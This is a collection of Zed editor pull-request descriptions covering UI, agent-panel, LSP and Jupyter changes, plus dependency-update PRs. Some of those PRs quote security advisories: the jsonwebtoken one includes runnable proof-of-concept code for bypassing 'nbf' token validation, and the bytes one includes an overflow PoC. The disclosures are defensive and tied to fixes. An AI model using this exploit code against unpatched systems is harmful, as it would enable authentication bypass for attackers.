<img width="1152" height="949" alt="Screenshot From 2026-02-12 11-40-16"
src="https://github.com/user-attachments/assets/b4e9a2f8-b38e-4de0-b910-067cc432b5bc"
/>
Release Notes:
- Added ability to select audio input/output devices as part of
Collaboration page in Settings. Added ability to test selected devices
with a simple playback loop routing input directly into output for
easier debugging of your audio devices.
---------
Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com>
Follow-up to https://github.com/zed-industries/zed/pull/46641.
In the PR linked above, I had introduced a dropdown that'd show up in
the title bar when the workspace contained more than one project.
Although that helped improve the multi-project use case, it created some
quirky designs:
- The project dropdown and the recent project pickers looked too
different from one another
- The transition between the 2 project case to the 1 project scenario,
from the dropdown, was not great, because you'd be then seeing the
bigger recent projects picker
- The `workspace: switch project` action was still reachable in the
command palette even if you had one project in the workspace
So, what this PR does is essentially fixing all of this by consolidating
it all in the Recent Projects picker. If you are in a multi-project
scenario, the picker will display a section with all of the projects on
the workspace allowing you to activate each one of them. The picker also
looks simpler when you reach it by clicking on the project name in the
title bar, as opposed to through the keybinding. I've then removed the
project dropdown code as well as the action, given we don't need them
anymore due to the consolidation. Lastly, I tackled the inconsistent
wording used between "Folders", "Projects", and "Workspaces".
Here's the result:
https://github.com/user-attachments/assets/9d8ef3e3-e57b-4558-9bc0-dcc401dec469
- [x] Code Reviewed
- [x] Manual QA
Release Notes:
- Workspace: Improved the recent projects picker by making it also
display active projects in case of a multi-project workspace.
Release Notes:
- Added agent panel restoration. Now restarting your editor won't cause
your thread to be forgotten.
---------
Co-authored-by: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com>
Co-authored-by: Eric Holk <eric@zed.dev>
Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com>
Co-authored-by: Anthony Eid <anthony@zed.dev>
Co-authored-by: Mikayla Maki <mikayla.c.maki@gmail.com>
Co-authored-by: Cameron Mcloughlin <cameron.studdstreet@gmail.com>
Closes#48683
Per the devcontainer spec, `.devcontainer.json` in the project root is
a valid config location. It is only used when no configurations are
found inside `.devcontainer/`.
Extract `find_configs_in_snapshot` for testability and add tests.
Release Notes:
- Added support for `.devcontainer.json` in project root
Currently, whenever Zed has a new version available for download, the
update button shows up in the status bar. Problem is: that status bar
slot can also display other buttons/information, such as problems with
your language server or general errors. In case the two things exist (a
problem and a new version), just one of them would be displayed, which
is not great; you should be able to see both. Additionally, given we
ship new versions pretty often, I've frequently saw feedback about
wanting to hide away the new version button... at least temporarily
while there's no immediate interest in upgrading.
So, this PR tackles all of that. The button to update a new version is
moved up to the title bar, nearby your avatar, and you have the ability
to dismiss, which effectively just moves the button from the title bar
to inside your user menu.
https://github.com/user-attachments/assets/e3f1d76d-9b85-4bee-a70f-e22dd5e7fdb3
Release Notes:
- Moved the update Zed button to the title bar and allowed it to be
dismissed.
---------
Co-authored-by: Conrad Irwin <conrad.irwin@gmail.com>
Various improvements to settings UI for granular tool permissions,
extracted from a larger change:
- Add **copy_path** tool to the permissions configuration list
- Replace local `RuleType` enum with `ToolPermissionMode` from the
settings crate
- Improve rule summary display: singular "1 rule" instead of always "1
rules", show invalid pattern count
- Add **terminal command parsing preview** — uses `extract_commands` to
split chained commands (`&&`, `||`, `;`) so the preview matches the real
permission engine's behavior
- Add **verdict label** showing the authoritative permission decision
(Allow/Deny/Confirm)
- Log disagreements between the pattern preview and the engine's
authoritative verdict
- Display **invalid regex patterns section** with compilation error
details
- Add regex validation error banner (dismissible) on tool config pages
- Add **compile-time validated** `tool_index` for macro-generated render
functions (fails to compile if a tool ID is misspelled)
- Update move_path/copy_path regex explanations for multi-input tools
- Add test validating all tools have `ToolInfo` entries or are in the
exclusion list
- Add `clear_on_confirm()` — clears the input after confirming (used for
"add pattern" inputs)
- Add editor reconciliation fix — when settings change externally (e.g.
editing settings.json), syncs the cached editor text when not focused
- Rename "Configure Tool Rules" → "Tool Permissions" in the settings
sidebar
- Update description text
- Add `regex_validation_error` field to `SettingsWindow` (cleared on
page navigation)
(No release notes because granular tool permissions are behind a feature
flag.)
Release Notes:
- N/A
---------
Co-authored-by: Danilo Leal <daniloleal09@gmail.com>
Follow-up to #47420 and #44193.
#47420 fixed child-exit status handling via upstream alacritty change
(https://github.com/alacritty/alacritty/pull/8825). However,
stable/preview/nightly builds still reproduced hangs that dev builds did
not.
The root cause matches #44193: spawned children inherit crash-handler
Mach exception ports and hang. We already reset exception ports in
`util::command::new_smol_command` and
`util::set_pre_exec_to_start_new_session`, but PTY child spawning in
`alacritty_terminal` was not covered.
This PR updates `alacritty_terminal` to include PTY `pre_exec`
exception-port reset:
9d9640d4e5
Upstream:
- https://github.com/alacritty/alacritty/pull/8835
Release Notes:
- Fixed terminal tasks hanging on macOS when a spawned process is killed
by a signal.
Fixes#48357
## Summary
- Bumps `tree-sitter-go` from `0.23` to `0.25`
- This fixes wrong syntax highlighting with chained indexing in Go (e.g.
`a[b][c] = 0` being incorrectly parsed as a type instantiation
expression instead of an index expression)
- The upstream fix
([tree-sitter/tree-sitter-go#160](https://github.com/tree-sitter/tree-sitter-go/issues/160))
landed in v0.25.0, which gives index expressions a higher dynamic
precedence over type instantiation expressions
- Updated `runnables.scm` to account for the new `statement_list` node
that wraps statements inside blocks in tree-sitter-go 0.25
## Test plan
- [x] `cargo test -p languages` — all 47 tests pass
- Verified that existing Go runnables queries (table tests, subtests,
test detection) work with the updated grammar
Release Notes:
- Fixed wrong syntax highlighting with chained indexing in Go (e.g.
`a[b][c]`) by bumping tree-sitter-go to 0.25
Bump the runtimed ecosystem packages to their 1.0 releases:
- `jupyter-protocol`: 0.10.0 → 1.1.0
- `jupyter-websocket-client`: 0.15.0 → 1.0.0
- `nbformat`: 0.15.0 → 1.0.0
- `runtimelib`: 0.30.0 → 1.1.0
One breaking change: `MimeType::Json` now wraps `serde_json::Value`
directly instead of `serde_json::Map<String, Value>`, so the redundant
`Value::Object(...)` wrapping in `outputs.rs` was removed.
Closes#41649
More Quality of Life improvements and Bug Fixes are coming in new PRs
after this is merged.
Release Notes:
- Fixes startup for R kernels and Python kernels on windows.
Move shell command parsing logic (`extract_commands` and supporting
code) from the agent crate into a new `shell_command_parser` crate so it
can be reused by `agent_servers` for ACP permission checking.
Release Notes:
- N/A
It's happeningggggg
Release Notes:
- Changed the Agent Panel so that the Active Thread is restored on
restart.
---------
Co-authored-by: Claude Opus 4.5 <noreply@anthropic.com>
Co-authored-by: Danilo Leal <daniloleal09@gmail.com>
Co-authored-by: Anthony Eid <anthony@zed.dev>
Co-authored-by: Danilo Leal <67129314+danilo-leal@users.noreply.github.com>
Co-authored-by: Richard Feldman <richard@zed.dev>
Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com>
This PR contains the following updates:
| Package | Type | Update | Change |
|---|---|---|---|
| [git2](https://redirect.github.com/rust-lang/git2-rs) |
workspace.dependencies | patch | `0.20.2` → `0.20.4` |
---
> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.
### GitHub Vulnerability Alerts
####
[GHSA-j39j-6gw9-jw6h](https://redirect.github.com/rust-lang/git2-rs/issues/1211)
If the Buf struct is dereferenced immediately after calling new() or
default() on the Buf struct, a null pointer is passed to the unsafe
function slice::from_raw_parts. According to the safety section
documentation of the function, data must be non-null and aligned even
for zero-length slices or slices of ZSTs. Thus, passing a null pointer
will lead to undefined behavior.
---
### Release Notes
<details>
<summary>rust-lang/git2-rs (git2)</summary>
###
[`v0.20.4`](https://redirect.github.com/rust-lang/git2-rs/compare/git2-0.20.3...git2-0.20.4)
[Compare
Source](https://redirect.github.com/rust-lang/git2-rs/compare/git2-0.20.3...git2-0.20.4)
###
[`v0.20.3`](https://redirect.github.com/rust-lang/git2-rs/compare/git2-0.20.2...git2-0.20.3)
[Compare
Source](https://redirect.github.com/rust-lang/git2-rs/compare/git2-0.20.2...git2-0.20.3)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" in timezone America/New_York,
Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
Release Notes:
- N/A
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45NS4yIiwidXBkYXRlZEluVmVyIjoiNDIuOTUuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
This PR contains the following updates:
| Package | Type | Update | Change |
|---|---|---|---|
| [time](https://time-rs.github.io)
([source](https://redirect.github.com/time-rs/time)) |
workspace.dependencies | patch | `0.3.44` → `0.3.47` |
---
> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.
### GitHub Vulnerability Alerts
####
[CVE-2026-25727](https://redirect.github.com/time-rs/time/security/advisories/GHSA-r6v5-fh4h-64xc)
### Impact
When user-provided input is provided to any type that parses with the
RFC 2822 format, a Denial of Service attack via stack exhaustion is
possible. The attack relies on formally deprecated and rarely-used
features that are part of the RFC 2822 format used in a malicious
manner. Ordinary, non-malicious input will never encounter this
scenario.
### Patches
A limit to the depth of recursion was added in v0.3.47. From this
version, an error will be returned rather than exhausting the stack.
### Workarounds
Limiting the length of user input is the simplest way to avoid stack
exhaustion, as the amount of the stack consumed would be at most a
factor of the length of the input.
---
### Release Notes
<details>
<summary>time-rs/time (time)</summary>
###
[`v0.3.47`](https://redirect.github.com/time-rs/time/blob/HEAD/CHANGELOG.md#0347-2026-02-05)
[Compare
Source](https://redirect.github.com/time-rs/time/compare/v0.3.46...v0.3.47)
##### Security
- The possibility of a stack exhaustion denial of service attack when
parsing RFC 2822 has been
eliminated. Previously, it was possible to craft input that would cause
unbounded recursion. Now,
the depth of the recursion is tracked, causing an error to be returned
if it exceeds a reasonable
limit.
This attack vector requires parsing user-provided input, with any type,
using the RFC 2822 format.
##### Compatibility
- Attempting to format a value with a well-known format (i.e. RFC 3339,
RFC 2822, or ISO 8601) will
error at compile time if the type being formatted does not provide
sufficient information. This
would previously fail at runtime. Similarly, attempting to format a
value with ISO 8601 that is
only configured for parsing (i.e. `Iso8601::PARSING`) will error at
compile time.
##### Added
- Builder methods for format description modifiers, eliminating the need
for verbose initialization
when done manually.
- `date!(2026-W01-2)` is now supported. Previously, a space was required
between `W` and `01`.
- `[end]` now has a `trailing_input` modifier which can either be
`prohibit` (the default) or
`discard`. When it is `discard`, all remaining input is ignored. Note
that if there are components
after `[end]`, they will still attempt to be parsed, likely resulting in
an error.
##### Changed
- More performance gains when parsing.
##### Fixed
- If manually formatting a value, the number of bytes written was one
short for some components.
This has been fixed such that the number of bytes written is always
correct.
- The possibility of integer overflow when parsing an owned format
description has been effectively
eliminated. This would previously wrap when overflow checks were
disabled. Instead of storing the
depth as `u8`, it is stored as `u32`. This would require multiple
gigabytes of nested input to
overflow, at which point we've got other problems and trivial
mitigations are available by
downstream users.
###
[`v0.3.46`](https://redirect.github.com/time-rs/time/blob/HEAD/CHANGELOG.md#0346-2026-01-23)
[Compare
Source](https://redirect.github.com/time-rs/time/compare/v0.3.45...v0.3.46)
##### Added
- All possible panics are now documented for the relevant methods.
- The need to use `#[serde(default)]` when using custom `serde` formats
is documented. This applies
only when deserializing an `Option<T>`.
- `Duration::nanoseconds_i128` has been made public, mirroring
`std::time::Duration::from_nanos_u128`.
- Various methods for truncating components have been added, avoiding
the need to call the fallible
`replace` methods multiple times.
For `PrimitiveDateTime`, `UtcDateTime`, and `OffsetDateTime`:
- `truncate_to_day`
For `Time`, `PrimitiveDateTime`, `UtcDateTime`, and `OffsetDateTime`:
- `truncate_to_hour`
- `truncate_to_minute`
- `truncate_to_second`
- `truncate_to_millisecond`
- `truncate_to_microsecond`
##### Changed
- The minimum supported Rust version is now 1.88.0.
- Significant performance gains in numerous locations. No public APIs
were changed or removed as
part of this.
- The size of `error::ComponentRange`, along with types that contain it,
has been significantly
reduced.
##### Fixed
- The `PartialOrd` and `Ord` implementations of `UtcOffset` now return
the expected result.
###
[`v0.3.45`](https://redirect.github.com/time-rs/time/blob/HEAD/CHANGELOG.md#0345-2026-01-13)
[Compare
Source](https://redirect.github.com/time-rs/time/compare/v0.3.44...v0.3.45)
##### Added
- `time::format_description::StaticFormatDescription` type alias for
`&'static [BorrowedFormatItem<'static>]`. This is the type returned by
the
`time::macros::format_description!` macro.
##### Changed
- The minimum supported Rust version is now 1.83.0.
- All floating point methods on `Duration` are now `const fn`.
- All setters on `Parsed` are now `const fn`.
- The `serde` dependency has been replaced with `serde_core`, This
reduces compile times by not
including unused parts of `serde`.
- `Date::from_julian_day` uses a new algorithm, resulting in an
approximately 16% performance
improvement. This method is used internally by numerous other methods.
- `util::is_leap_year` uses a new algorithm, resulting in an
approximately 8% performance
improvement.
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" in timezone America/New_York,
Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
Release Notes:
- N/A
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45NS4yIiwidXBkYXRlZEluVmVyIjoiNDIuOTUuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
TODO:
- [x] Review code
- [x] Decide whether to keep ignored API tests
Release Notes:
- Fixed a bug where cancelling a thread mid-thought would cause further
anthropic requests to fail
- Fixed a bug where the model configured on a thread would not be
persisted alongside that thread
Fixes#36818
Release Notes:
- Added new `global_lsp_settings.request_timeout` setting to configure
the maximum timeout duration for LSP-related operations.
Code inspired by [prior
implementation](https://github.com/zed-industries/zed/pull/38443),
though with a few tweaks here & there (like using `serde:default` and
keeping the pre-defined constant in the LSP file).
---------
Co-authored-by: Kirill Bulatov <mail4score@gmail.com>
Co-authored-by: Kirill Bulatov <kirill@zed.dev>
- **build: remove assistant_slash_commands dependency in
assistant_text_thread**
- **diagnostics: Do not depend on search**
- **Remove terminal_view's dependency on search**
- **sever breadcrumbs <-> editor dep (for the sake of terminal_view)**
Release Notes:
- N/A
Previously, some settings migrations only operated on root-level keys
and missed settings nested under platform keys (`macos`, `linux`, etc.),
channel keys (`nightly`, `stable`, etc.), or profile blocks. This fixes
migrations to recurse into those nested locations.
Also fixes `m_2026_02_02` to gracefully skip when `edit_predictions` is
not an object (e.g. `true`) instead of bailing and aborting the entire
migration chain.
Release Notes:
- Fixed settings migrations to correctly handle settings nested under
platform, channel, or profile keys.
This allows us to switch the prompt format without client-side changes.
If we want to experiment with prompt formats or models other than the
currently-deployed one, we can use the raw endpoint, and do prompt
construction and output processing on the client.
This also adds an optional environment parameter to the raw endpoint, so
that we can use that endpoint in the new scheme where we're deploying to
separate environments for different zeta prompt versions.
Release Notes:
- N/A
Closes#46506
Release Notes:
- Fixed an issue where the codestral URL used for credentials would be
different than the one used for requests causing authentication errors
Currently we always compute breadcrumbs and sticky headers on every
editor paint which is not cheap to do especially in bigger files, moving
this off to be computed on event handling where they change and then
caching them can save serveral milliseconds per render in bigger files.
This also puts matching brackets refreshing and document highlights on a
background task, as this tends to block the main task for prolonged time
as well.
Release Notes:
- N/A *or* Added/Fixed/Improved ...
Part of #7450
Big thanks to @macmv for pushing this forwards so much!
Rebased version of https://github.com/zed-industries/zed/pull/39539 as
working on an in-org branch simplifies a lot of things for us)
Release Notes:
- Added LSP semantic tokens highlighting support
---------
Co-authored-by: Neil Macneale V <neil.macneale.v@gmail.com>
Co-authored-by: Kirill Bulatov <kirill@zed.dev>
Co-authored-by: Zed Zippy <234243425+zed-zippy[bot]@users.noreply.github.com>
- Keyboard navigation where you can traverse through cells using up and
down arrow
- Jupyter Logo added
- Initialize kernel as shutdown for more predictable behavior
- Ability to create .ipynb files with bare essential metadata.
- Optimize editor initialization to avoid cloning the entire notebook
and shortcuts
Release Notes:
- N/A
---------
Co-authored-by: Danilo Leal <daniloleal09@gmail.com>
This PR adds a page in the settings UI, under the AI section, that
allows to interact and customize permissions for tool calling for each
tool available to Zed's native agent.
Release Notes:
- AI: Added a settings page in the settings editor that allows to
customize tool call permissions for each tool.
---------
Co-authored-by: Richard Feldman <oss@rtfeldman.com>
Previously, Ollama would not show up as available until you opened some
UI that prompted connecting to Ollama, like the agent panel or the edit
prediction settings.
Release Notes:
- N/A
Closes https://github.com/zed-industries/zed/issues/15968
Release Notes:
- Added the ability to use Ollama as an edit prediction provider
---------
Co-authored-by: Oleksiy Syvokon <oleksiy@zed.dev>
Co-authored-by: Ben Kunkle <ben@zed.dev>
This PR contains the following updates:
| Package | Type | Update | Change |
|---|---|---|---|
| [jsonwebtoken](https://redirect.github.com/Keats/jsonwebtoken) |
workspace.dependencies | major | `9.3` → `10.0` |
---
> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.
### GitHub Vulnerability Alerts
####
[GHSA-h395-gr6q-cpjc](https://redirect.github.com/Keats/jsonwebtoken/security/advisories/GHSA-h395-gr6q-cpjc)
## Summary:
It has been discovered that there is a Type Confusion vulnerability in
jsonwebtoken, specifically, in its claim validation logic.
When a standard claim (such as nbf or exp) is provided with an incorrect
JSON type (Like a String instead of a Number), the library’s internal
parsing mechanism marks the claim as “FailedToParse”. Crucially, the
validation logic treats this “FailedToParse” state identically to
“NotPresent”.
This means that if a check is enabled (like: validate_nbf = true), but
the claim is not explicitly marked as required in required_spec_claims,
the library will skip the validation check entirely for the malformed
claim, treating it as if it were not there. This allows attackers to
bypass critical time-based security restrictions (like “Not Before”
checks) and commit potential authentication and authorization bypasses.
## Details:
The vulnerability stems from the interaction between the TryParse enum
and the validate function in
[src/validation.rs](https://redirect.github.com/Keats/jsonwebtoken/blob/master/src/validation.rs).
1. The TryParse Enum: The library uses a custom TryParse enum to handle
claim deserialization:
```
enum TryParse<T> {
Parsed(T),
FailedToParse, // Set when deserialization fails (e.g. type mismatch)
NotPresent,
}
```
If a user sends {“nbf”: “99999999999”} (legacy/string format), serde
fails to parse it as u64, and it results in TryParse::FailedToParse.
1. The Validation Logic Flaw (src/validation.rs): In
Validation::validate, the code checks for exp and nbf
like this:
```
// L288-291
if matches!(claims.nbf, TryParse::Parsed(nbf) if options.validate_nbf && nbf > now + options.leeway) {
return Err(new_error(ErrorKind::ImmatureSignature));
}
```
This matches! macro explicitly looks for TryParse::Parsed(nbf).
• If claims.nbf is FailedToParse, the match returns false.
• The if block is skipped.
• No error is returned.
1. The “Required Claims” Gap: The only fallback mechanism is the
“Required Claims” check:
```
// Lines 259-267
for required_claim in &options.required_spec_claims {
let present = match required_claim.as_str() {
"nbf" => matches!(claims.nbf, TryParse::Parsed(_)),
// ...
};
if !present { return Err(...); }
}
```
If “nbf” IS in required_spec_claims, FailedToParse will fail the
matches!(..., Parsed(_)) check, causing the present to be false, and
correctly returning an error.
However, widely accepted usage patterns often enable validation flags
(validate_nbf = true) without adding the claim to the required list,
assuming that enabling validation implicitly requires the claim’s
validity if it appears in the token. jsonwebtoken seems to violate this
assumption.
Environment:
• Version: jsonwebtoken 10.2.0
• Rust Version: rustc 1.90.0
• Cargo Version: cargo 1.90.0
• OS: MacOS Tahoe 26.2
POC:
For demonstrating, Here is this simple rust code that demonstrates the
bypass. It attempts to validate a token with a string nbf claiming to be
valid only in the far future.
create a new project:
```
cargo new nbf_poc; cd nbf_poc
```
add required dependencies:
```
cargo add serde --features derive
cargo add jsonwebtoken --features rust_crypto
cargo add serde_json
```
replace the code in src/main.rs with this:
```
use jsonwebtoken::{decode, Validation, Algorithm, DecodingKey, Header, EncodingKey, encode};
use serde::{Deserialize, Serialize};
#[derive(Debug, Serialize, Deserialize)]
struct Claims {
sub: String,
nbf: String, // Attacker sends nbf as a String
exp: usize,
}
fn main() {
let key: &[u8; 24] = b"RedMouseOverTheSkyIsBlue";
// nbf is a String "99999999999" (Far future)
// Real nbf should be a Number.
let my_claims: Claims = Claims {
sub: "krishna".to_string(),
nbf: "99999999999".to_string(),
exp: 10000000000,
};
let token: String = encode(&Header::default(), &my_claims, &EncodingKey::from_secret(key)).unwrap();
println!("Forged Token: {}", token);
// 2. Configure Validation
let mut validation: Validation = Validation::new(Algorithm::HS256);
validation.validate_nbf = true; // Enable NBF check
// We do NOT add "nbf" to required_spec_claims (default behavior)
// We decode to serde_json::Value to avoid strict type errors in our struct definition hiding the library bug.
// The library sees the raw JSON with string "nbf".
let result: Result<jsonwebtoken::TokenData<serde_json::Value>, jsonwebtoken::errors::Error> = decode::<serde_json::Value>(
&token,
&DecodingKey::from_secret(key),
&validation
);
match result {
Ok(_) => println!("Token was accepted despite malformed far-future 'nbf'!"),
Err(e) => println!("Token rejected. Error: {:?}", e),
}
}
```
run cargo run
expected behaviour:
```
Forged Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJrcmlzaG5hIiwibmJmIjoiOTk5OTk5OTk5OTkiLCJleHAiOjEwMDAwMDAwMDAwfQ.Fm3kZIqMwqIA6sEA1w52UOMqqnu4hlO3FQStFmbaOwk
```
Token was accepted despite malformed far-future 'nbf'!
Impact:
If an application uses jsonwebtoken nbf (Not Before) to schedule access
for the future (like “Access granted starting tomorrow”).
By sending nbf as a string, an attacker can bypass this restriction and
access the resource immediately.
and for the exp claim (this is unlikely but still adding), If a
developer sets validate_exp = true but manually handles claim presence
(removing exp from required_spec_claims), an attacker can send a string
exp (e.g., “never”) and bypass expiration checks entirely. The token
becomes valid forever.
---
### Release Notes
<details>
<summary>Keats/jsonwebtoken (jsonwebtoken)</summary>
###
[`v10.3.0`](https://redirect.github.com/Keats/jsonwebtoken/blob/HEAD/CHANGELOG.md#1030-2026-01-27)
[Compare
Source](https://redirect.github.com/Keats/jsonwebtoken/compare/v10.2.0...v10.3.0)
- Export everything needed to define your own CryptoProvider
- Fix type confusion with exp/nbf when not required
###
[`v10.2.0`](https://redirect.github.com/Keats/jsonwebtoken/blob/HEAD/CHANGELOG.md#1020-2025-11-06)
[Compare
Source](https://redirect.github.com/Keats/jsonwebtoken/compare/v10.1.0...v10.2.0)
- Remove `Clone` bound from decode functions
###
[`v10.1.0`](https://redirect.github.com/Keats/jsonwebtoken/blob/HEAD/CHANGELOG.md#1010-2025-10-18)
[Compare
Source](https://redirect.github.com/Keats/jsonwebtoken/compare/v10.0.0...v10.1.0)
- add `dangerous::insecure_decode`
- Implement TryFrom \&Jwk for DecodingKey
###
[`v10.0.0`](https://redirect.github.com/Keats/jsonwebtoken/blob/HEAD/CHANGELOG.md#1000-2025-09-29)
[Compare
Source](https://redirect.github.com/Keats/jsonwebtoken/compare/v9.3.1...v10.0.0)
- BREAKING: now using traits for crypto backends, you have to choose
between `aws_lc_rs` and `rust_crypto`
- Add `Clone` bound to `decode`
- Support decoding byte slices
- Support JWS
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" in timezone America/New_York,
Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
Release Notes:
- N/A
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45NS4yIiwidXBkYXRlZEluVmVyIjoiNDIuOTUuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->
---------
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Marshall Bowers <git@maxdeviant.com>
This PR contains the following updates:
| Package | Type | Update | Change |
|---|---|---|---|
| [bytes](https://redirect.github.com/tokio-rs/bytes) |
workspace.dependencies | minor | `1.10.1` → `1.11.1` |
---
> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency
Dashboard for more information.
### GitHub Vulnerability Alerts
####
[GHSA-434x-w66g-qw3r](https://redirect.github.com/tokio-rs/bytes/security/advisories/GHSA-434x-w66g-qw3r)
# Details
In the unique reclaim path of `BytesMut::reserve`, the condition
```rs
if v_capacity >= new_cap + offset
```
uses an unchecked addition. When `new_cap + offset` overflows `usize` in
release builds, this condition may incorrectly pass, causing `self.cap`
to be set to a value that exceeds the actual allocated capacity.
Subsequent APIs such as `spare_capacity_mut()` then trust this corrupted
`cap` value and may create out-of-bounds slices, leading to UB.
This behavior is observable in release builds (integer overflow wraps),
whereas debug builds panic due to overflow checks.
## PoC
```rs
use bytes::*;
fn main() {
let mut a = BytesMut::from(&b"hello world"[..]);
let mut b = a.split_off(5);
// Ensure b becomes the unique owner of the backing storage
drop(a);
// Trigger overflow in new_cap + offset inside reserve
b.reserve(usize::MAX - 6);
// This call relies on the corrupted cap and may cause UB & HBO
b.put_u8(b'h');
}
```
# Workarounds
Users of `BytesMut::reserve` are only affected if integer overflow
checks are configured to wrap. When integer overflow is configured to
panic, this issue does not apply.
---
### Release Notes
<details>
<summary>tokio-rs/bytes (bytes)</summary>
###
[`v1.11.1`](https://redirect.github.com/tokio-rs/bytes/blob/HEAD/CHANGELOG.md#1111-February-3rd-2026)
[Compare
Source](https://redirect.github.com/tokio-rs/bytes/compare/v1.11.0...v1.11.1)
- Fix integer overflow in `BytesMut::reserve`
###
[`v1.11.0`](https://redirect.github.com/tokio-rs/bytes/blob/HEAD/CHANGELOG.md#1110-November-14th-2025)
[Compare
Source](https://redirect.github.com/tokio-rs/bytes/compare/v1.10.1...v1.11.0)
- Bump MSRV to 1.57
([#​788](https://redirect.github.com/tokio-rs/bytes/issues/788))
##### Fixed
- fix: `BytesMut` only reuse if src has remaining
([#​803](https://redirect.github.com/tokio-rs/bytes/issues/803))
- Specialize `BytesMut::put::<Bytes>`
([#​793](https://redirect.github.com/tokio-rs/bytes/issues/793))
- Reserve capacity in `BytesMut::put`
([#​794](https://redirect.github.com/tokio-rs/bytes/issues/794))
- Change `BytesMut::remaining_mut` to use `isize::MAX` instead of
`usize::MAX`
([#​795](https://redirect.github.com/tokio-rs/bytes/issues/795))
##### Internal changes
- Guarantee address in `slice()` for empty slices.
([#​780](https://redirect.github.com/tokio-rs/bytes/issues/780))
- Rename `Vtable::to_*` -> `Vtable::into_*`
([#​776](https://redirect.github.com/tokio-rs/bytes/issues/776))
- Fix latest clippy warnings
([#​787](https://redirect.github.com/tokio-rs/bytes/issues/787))
- Ignore `BytesMut::freeze` doctest on wasm
([#​790](https://redirect.github.com/tokio-rs/bytes/issues/790))
- Move `drop_fn` of `from_owner` into vtable
([#​801](https://redirect.github.com/tokio-rs/bytes/issues/801))
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" in timezone America/New_York,
Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
Release Notes:
- N/A
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45NS4yIiwidXBkYXRlZEluVmVyIjoiNDIuOTUuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOltdfQ==-->
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Follow-up to #46337
`project_panel` tests enable `remote/test-support` (via
`workspace`/`project`), which adds `RemoteConnectionOptions::Mock`. But
without `remote_connection/test-support`, the match arm for that variant
isn't compiled, causing a non-exhaustive match error when testing the
crate in isolation.
CI doesn't catch this because `git_ui` happens to enable
`remote_connection/test-support` during workspace-wide tests.
Release Notes:
- N/A
Closes#48097
Release Notes:
- Fixed Copilot instances not being cleared up after their window is
closed.
- Copilot edit prediction provider now respects `disable_ai` setting.
The indent guide computation was using visible list indices directly to
access entries, instead of mapping through `logical_indices` first. This
caused incorrect depths to be read from hidden entries when a folder was
collapsed, resulting in stray vertical lines extending to unrelated folders.
Closes#48189
Release Notes:
- Fixed a visual bug in the Git Panel where collapsing a folder in tree
view would cause indent guide lines to incorrectly extend to unrelated
folders below it.
This branch:
1. teaches `--diff `command line option to to recurse into folders if
provided.
2. Adds a `MultiDiffView` that shows _all_ changed files in a single,
scrollable view.
This is necessary to provide a smooth user experience for `jj` and Zed
users who wish to use Zed as their jj difftool.
I'm not fully sure how this change interacts with
https://github.com/zed-industries/zed/pull/44936, or what plans y'all
have in mind.
Here's a screenshot of the resulting behavior:
<img width="1090" height="950" alt="Screenshot 2025-12-17 at 9 10 52 AM"
src="https://github.com/user-attachments/assets/8efd09b4-974f-4059-9f94-539c484c6d4a"
/>
I setup zed to handle jj diffs by adding the following to my jj config:
```toml
[aliases]
zdiff = ["diff", "--tool", "zed"]
[merge-tools.zed]
program = "/Users/dbarsky/Developer/zed/target/debug/cli"
# omit diff-invocation-mode to keep the default (JJ passes two dirs)
diff-args = [
"--zed", "/Users/dbarsky/Developer/zed/target/debug/zed",
"--wait",
"--new",
"--diff",
"$left",
"$right",
]
```
Release Notes:
- `--diff`, if provided with folders instead of files, will recurse into
those directories.
- Added a `MultiDiffView`, which will show all changed files within a
single, scrollable view.
**AI Disclosure**: Pretty much all of this code was written using Codex
